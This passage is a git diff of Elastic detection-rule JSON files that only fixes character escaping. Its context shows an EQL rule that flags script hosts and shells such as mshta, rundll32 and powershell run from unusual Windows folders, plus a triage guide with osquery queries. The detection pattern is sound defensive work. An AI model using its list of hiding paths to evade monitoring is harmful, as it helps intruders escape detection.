diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_107.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_107.json
index 64f64fbe14c..4817a65e862 100644
--- a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. 
Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, 
pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to 
reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n 
\"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n 
\"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_108.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_108.json
index bfa05b10999..e63afb1b104 100644
--- a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_108.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. 
Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, 
pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to 
reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n 
\"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n 
\"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_109.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_109.json
index 6e5f52cd7e0..b9e2bac7363 100644
--- a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_109.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous 